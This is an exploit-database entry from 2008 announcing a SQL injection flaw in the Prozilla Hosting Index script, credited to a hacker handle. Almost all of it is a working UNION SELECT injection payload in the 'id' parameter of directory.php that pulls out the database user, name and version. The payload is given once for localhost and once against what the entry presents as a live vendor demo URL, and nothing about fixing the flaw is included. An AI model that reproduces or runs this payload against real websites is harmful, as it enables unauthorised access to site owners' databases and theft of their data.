id: 4229
date: 11/23/2008
title: Prozilla Hosting Index (id) Remote SQL Injection Vulnerability
author: Snakespc
cves: 

==============================================================
Prozilla Hosting Index (id) Remote SQL Injection Vulnerability
==============================================================


==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                =                          Script site: turnkeyzone.com   "directory.php"            =
                  ===================================Snakespc======================================

Exploit:
http://localhost/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
********
demo:
http://turnkeyzone.com/demos/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
===================================================================================================================



#  0day.today [2023-03-22]  #